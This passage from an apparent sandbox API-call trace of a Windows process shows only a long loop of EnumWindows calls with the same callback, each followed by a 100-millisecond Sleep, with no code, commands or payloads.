(dwMilliseconds=0x64) [0222.049] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.049] Sleep (dwMilliseconds=0x64) [0222.090] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.091] Sleep (dwMilliseconds=0x64) [0222.132] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.132] Sleep (dwMilliseconds=0x64) [0222.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.192] Sleep (dwMilliseconds=0x64) [0222.207] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.208] Sleep (dwMilliseconds=0x64) [0222.212] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.212] Sleep (dwMilliseconds=0x64) [0222.228] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.228] Sleep (dwMilliseconds=0x64) [0222.233] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.233] Sleep (dwMilliseconds=0x64) [0222.236] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.236] Sleep (dwMilliseconds=0x64) [0222.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.239] Sleep (dwMilliseconds=0x64) [0222.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.243] Sleep (dwMilliseconds=0x64) [0222.246] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.246] Sleep (dwMilliseconds=0x64) [0222.252] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.253] Sleep (dwMilliseconds=0x64) [0222.256] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.256] Sleep (dwMilliseconds=0x64) [0222.268] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.269] Sleep (dwMilliseconds=0x64) [0222.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.274] Sleep (dwMilliseconds=0x64) [0222.279] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.280] Sleep (dwMilliseconds=0x64) [0222.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.296] Sleep (dwMilliseconds=0x64) [0222.322] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.322] Sleep (dwMilliseconds=0x64) [0222.403] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.404] Sleep (dwMilliseconds=0x64) [0222.479] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.480] Sleep (dwMilliseconds=0x64) [0222.631] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.631] Sleep (dwMilliseconds=0x64) [0222.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.705] Sleep (dwMilliseconds=0x64) [0222.757] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.757] Sleep (dwMilliseconds=0x64) [0222.797] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.797] Sleep (dwMilliseconds=0x64) [0222.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.863] Sleep (dwMilliseconds=0x64) [0222.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.898] Sleep (dwMilliseconds=0x64) [0222.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.910] Sleep (dwMilliseconds=0x64) [0222.938] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.938] Sleep (dwMilliseconds=0x64) [0222.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.953] Sleep (dwMilliseconds=0x64) [0222.997] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.997] Sleep (dwMilliseconds=0x64) [0223.113] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.114] Sleep (dwMilliseconds=0x64) [0223.213] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.214] Sleep (dwMilliseconds=0x64) [0223.286] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.287] Sleep (dwMilliseconds=0x64) [0223.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.327] Sleep (dwMilliseconds=0x64) [0223.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.381] Sleep (dwMilliseconds=0x64) [0223.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.430] Sleep (dwMilliseconds=0x64) [0223.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.480] Sleep (dwMilliseconds=0x64) [0223.503] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.503] Sleep (dwMilliseconds=0x64) [0223.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.512] Sleep (dwMilliseconds=0x64) [0223.527] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.527] Sleep (dwMilliseconds=0x64) [0223.534] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.534] Sleep (dwMilliseconds=0x64) [0223.558] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.558] Sleep (dwMilliseconds=0x64) [0223.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.590] Sleep (dwMilliseconds=0x64) [0223.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.638] Sleep (dwMilliseconds=0x64) [0223.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.717] Sleep (dwMilliseconds=0x64) [0223.829] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.829] Sleep (dwMilliseconds=0x64) [0223.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.913] Sleep (dwMilliseconds=0x64) [0223.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.953] Sleep (dwMilliseconds=0x64) [0223.996] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0223.996] Sleep (dwMilliseconds=0x64) [0224.047] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.047] Sleep (dwMilliseconds=0x64) [0224.088] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.088] Sleep (dwMilliseconds=0x64) [0224.121] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.121] Sleep (dwMilliseconds=0x64) [0224.124] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.125] Sleep (dwMilliseconds=0x64) [0224.129] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.130] Sleep (dwMilliseconds=0x64) [0224.137] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.138] Sleep (dwMilliseconds=0x64) [0224.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.142] Sleep (dwMilliseconds=0x64) [0224.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.145] Sleep (dwMilliseconds=0x64) [0224.174] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.174] Sleep (dwMilliseconds=0x64) [0224.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.178] Sleep (dwMilliseconds=0x64) [0224.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.192] Sleep (dwMilliseconds=0x64) [0224.201] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.201] Sleep (dwMilliseconds=0x64) [0224.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.238] Sleep (dwMilliseconds=0x64) [0224.319] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.319] Sleep (dwMilliseconds=0x64) [0224.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.415] Sleep (dwMilliseconds=0x64) [0224.464] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.465] Sleep (dwMilliseconds=0x64) [0224.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.506] Sleep (dwMilliseconds=0x64) [0224.548] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.548] Sleep (dwMilliseconds=0x64) [0224.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.591] Sleep (dwMilliseconds=0x64) [0224.631] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.631] Sleep (dwMilliseconds=0x64) [0224.673] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.673] Sleep (dwMilliseconds=0x64) [0224.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.694] Sleep (dwMilliseconds=0x64) [0224.698] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.698] Sleep (dwMilliseconds=0x64) [0224.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.702] Sleep (dwMilliseconds=0x64) [0224.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.705] Sleep (dwMilliseconds=0x64) [0224.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.720] Sleep (dwMilliseconds=0x64) [0224.724] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.725] Sleep (dwMilliseconds=0x64) [0224.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.734] Sleep (dwMilliseconds=0x64) [0224.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.748] Sleep (dwMilliseconds=0x64) [0224.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.779] Sleep (dwMilliseconds=0x64) [0224.818] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.818] Sleep (dwMilliseconds=0x64) [0224.921] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0224.921] Sleep (dwMilliseconds=0x64) [0225.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.093] Sleep (dwMilliseconds=0x64) [0225.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.219] Sleep (dwMilliseconds=0x64) [0225.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.261] Sleep (dwMilliseconds=0x64) [0225.314] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.314] Sleep (dwMilliseconds=0x64) [0225.344] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.344] Sleep (dwMilliseconds=0x64) [0225.351] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.352] Sleep (dwMilliseconds=0x64) [0225.355] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.356] Sleep (dwMilliseconds=0x64) [0225.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.362] Sleep (dwMilliseconds=0x64) [0225.368] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.368] Sleep (dwMilliseconds=0x64) [0225.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.371] Sleep (dwMilliseconds=0x64) [0225.385] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.385] Sleep (dwMilliseconds=0x64) [0225.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.390] Sleep (dwMilliseconds=0x64) [0225.395] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.395] Sleep (dwMilliseconds=0x64) [0225.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.418] Sleep (dwMilliseconds=0x64) [0225.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.458] Sleep (dwMilliseconds=0x64) [0225.533] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.533] Sleep (dwMilliseconds=0x64) [0225.610] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.611] Sleep (dwMilliseconds=0x64) [0225.675] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.675] Sleep (dwMilliseconds=0x64) [0225.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.751] Sleep (dwMilliseconds=0x64) [0225.791] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.791] Sleep (dwMilliseconds=0x64) [0225.842] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.842] Sleep (dwMilliseconds=0x64) [0225.882] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.882] Sleep (dwMilliseconds=0x64) [0225.930] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.930] Sleep (dwMilliseconds=0x64) [0225.935] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.935] Sleep (dwMilliseconds=0x64) [0225.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.947] Sleep (dwMilliseconds=0x64) [0225.956] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.957] Sleep (dwMilliseconds=0x64) [0225.962] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.962] Sleep (dwMilliseconds=0x64) [0225.966] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.967] Sleep (dwMilliseconds=0x64) [0225.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.972] Sleep (dwMilliseconds=0x64) [0225.980] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.980] Sleep (dwMilliseconds=0x64) [0225.989] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.990] Sleep (dwMilliseconds=0x64) [0225.994] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0225.994] Sleep (dwMilliseconds=0x64) [0226.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.015] Sleep (dwMilliseconds=0x64) [0226.054] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.055] Sleep (dwMilliseconds=0x64) [0226.193] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.193] Sleep (dwMilliseconds=0x64) [0226.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.272] Sleep (dwMilliseconds=0x64) [0226.353] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.353] Sleep (dwMilliseconds=0x64) [0226.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.440] Sleep (dwMilliseconds=0x64) [0226.481] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.481] Sleep (dwMilliseconds=0x64) [0226.523] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.523] Sleep (dwMilliseconds=0x64) [0226.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.549] Sleep (dwMilliseconds=0x64) [0226.554] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.555] Sleep (dwMilliseconds=0x64) [0226.558] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.558] Sleep (dwMilliseconds=0x64) [0226.566] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.566] Sleep (dwMilliseconds=0x64) [0226.568] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.569] Sleep (dwMilliseconds=0x64) [0226.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.572] Sleep (dwMilliseconds=0x64) [0226.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.584] Sleep (dwMilliseconds=0x64) [0226.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.587] Sleep (dwMilliseconds=0x64) [0226.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.589] Sleep (dwMilliseconds=0x64) [0226.592] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.592] Sleep (dwMilliseconds=0x64) [0226.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.596] Sleep (dwMilliseconds=0x64) [0226.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.599] Sleep (dwMilliseconds=0x64) [0226.601] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.601] Sleep (dwMilliseconds=0x64) [0226.604] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.604] Sleep (dwMilliseconds=0x64) [0226.608] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.608] Sleep (dwMilliseconds=0x64) [0226.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.613] Sleep (dwMilliseconds=0x64) [0226.615] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.616] Sleep (dwMilliseconds=0x64) [0226.618] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.618] Sleep (dwMilliseconds=0x64) [0226.636] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.636] Sleep (dwMilliseconds=0x64) [0226.662] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.663] Sleep (dwMilliseconds=0x64) [0226.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.740] Sleep (dwMilliseconds=0x64) [0226.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.817] Sleep (dwMilliseconds=0x64) [0226.880] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.881] Sleep (dwMilliseconds=0x64) [0226.946] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0226.947] Sleep (dwMilliseconds=0x64) [0227.022] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.022] Sleep (dwMilliseconds=0x64) [0227.088] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.088] Sleep (dwMilliseconds=0x64) [0227.131] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.132] Sleep (dwMilliseconds=0x64) [0227.146] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.146] Sleep (dwMilliseconds=0x64) [0227.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.167] Sleep (dwMilliseconds=0x64) [0227.172] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.172] Sleep (dwMilliseconds=0x64) [0227.177] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.177] Sleep (dwMilliseconds=0x64) [0227.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.186] Sleep (dwMilliseconds=0x64) [0227.188] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.189] Sleep (dwMilliseconds=0x64) [0227.193] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.193] Sleep (dwMilliseconds=0x64) [0227.197] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.197] Sleep (dwMilliseconds=0x64) [0227.203] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.203] Sleep (dwMilliseconds=0x64) [0227.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.209] Sleep (dwMilliseconds=0x64) [0227.213] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.213] Sleep (dwMilliseconds=0x64) [0227.216] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.216] Sleep (dwMilliseconds=0x64) [0227.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.220] Sleep (dwMilliseconds=0x64) [0227.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.226] Sleep (dwMilliseconds=0x64) [0227.231] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.231] Sleep (dwMilliseconds=0x64) [0227.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.239] Sleep (dwMilliseconds=0x64) [0227.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.242] Sleep (dwMilliseconds=0x64) [0227.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.245] Sleep (dwMilliseconds=0x64) [0227.288] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.288] Sleep (dwMilliseconds=0x64) [0227.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.377] Sleep (dwMilliseconds=0x64) [0227.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.419] Sleep (dwMilliseconds=0x64) [0227.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.457] Sleep (dwMilliseconds=0x64) [0227.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.506] Sleep (dwMilliseconds=0x64) [0227.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.548] Sleep (dwMilliseconds=0x64) [0227.601] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.601] Sleep (dwMilliseconds=0x64) [0227.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.663] Sleep (dwMilliseconds=0x64) [0227.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.702] Sleep (dwMilliseconds=0x64) [0227.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.741] Sleep (dwMilliseconds=0x64) [0227.831] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.831] Sleep (dwMilliseconds=0x64) [0227.904] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.904] Sleep (dwMilliseconds=0x64) [0227.945] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.945] Sleep (dwMilliseconds=0x64) [0227.986] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0227.987] Sleep (dwMilliseconds=0x64) [0228.023] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.024] Sleep (dwMilliseconds=0x64) [0228.070] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.070] Sleep (dwMilliseconds=0x64) [0228.110] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.110] Sleep (dwMilliseconds=0x64) [0228.114] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.115] Sleep (dwMilliseconds=0x64) [0228.119] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.119] Sleep (dwMilliseconds=0x64) [0228.125] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.125] Sleep (dwMilliseconds=0x64) [0228.127] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.128] Sleep (dwMilliseconds=0x64) [0228.130] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.130] Sleep (dwMilliseconds=0x64) [0228.133] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.134] Sleep (dwMilliseconds=0x64) [0228.136] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.136] Sleep (dwMilliseconds=0x64) [0228.140] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.140] Sleep (dwMilliseconds=0x64) [0228.144] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.145] Sleep (dwMilliseconds=0x64) [0228.171] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.171] Sleep (dwMilliseconds=0x64) [0228.173] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.174] Sleep (dwMilliseconds=0x64) [0228.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.176] Sleep (dwMilliseconds=0x64) [0228.181] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.181] Sleep (dwMilliseconds=0x64) [0228.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.190] Sleep (dwMilliseconds=0x64) [0228.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.192] Sleep (dwMilliseconds=0x64) [0228.195] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.195] Sleep (dwMilliseconds=0x64) [0228.198] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.198] Sleep (dwMilliseconds=0x64) [0228.223] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.223] Sleep (dwMilliseconds=0x64) [0228.290] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.291] Sleep (dwMilliseconds=0x64) [0228.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.372] Sleep (dwMilliseconds=0x64) [0228.445] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.446] Sleep (dwMilliseconds=0x64) [0228.563] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.563] Sleep (dwMilliseconds=0x64) [0228.610] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.611] Sleep (dwMilliseconds=0x64) [0228.690] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.690] Sleep (dwMilliseconds=0x64) [0228.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.716] Sleep (dwMilliseconds=0x64) [0228.719] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.720] Sleep (dwMilliseconds=0x64) [0228.724] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.724] Sleep (dwMilliseconds=0x64) [0228.730] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.730] Sleep (dwMilliseconds=0x64) [0228.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.735] Sleep (dwMilliseconds=0x64) [0228.737] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.737] Sleep (dwMilliseconds=0x64) [0228.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.740] Sleep (dwMilliseconds=0x64) [0228.746] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.746] Sleep (dwMilliseconds=0x64) [0228.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.752] Sleep (dwMilliseconds=0x64) [0228.789] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.789] Sleep (dwMilliseconds=0x64) [0228.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.807] Sleep (dwMilliseconds=0x64) [0228.835] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.835] Sleep (dwMilliseconds=0x64) [0228.908] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.910] Sleep (dwMilliseconds=0x64) [0228.983] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0228.983] Sleep (dwMilliseconds=0x64) [0229.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.033] Sleep (dwMilliseconds=0x64) [0229.117] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.118] Sleep (dwMilliseconds=0x64) [0229.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.232] Sleep (dwMilliseconds=0x64) [0229.273] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.273] Sleep (dwMilliseconds=0x64) [0229.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.317] Sleep (dwMilliseconds=0x64) [0229.320] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.321] Sleep (dwMilliseconds=0x64) [0229.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.332] Sleep (dwMilliseconds=0x64) [0229.339] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.339] Sleep (dwMilliseconds=0x64) [0229.346] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.346] Sleep (dwMilliseconds=0x64) [0229.349] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.349] Sleep (dwMilliseconds=0x64) [0229.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.353] Sleep (dwMilliseconds=0x64) [0229.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.358] Sleep (dwMilliseconds=0x64) [0229.363] 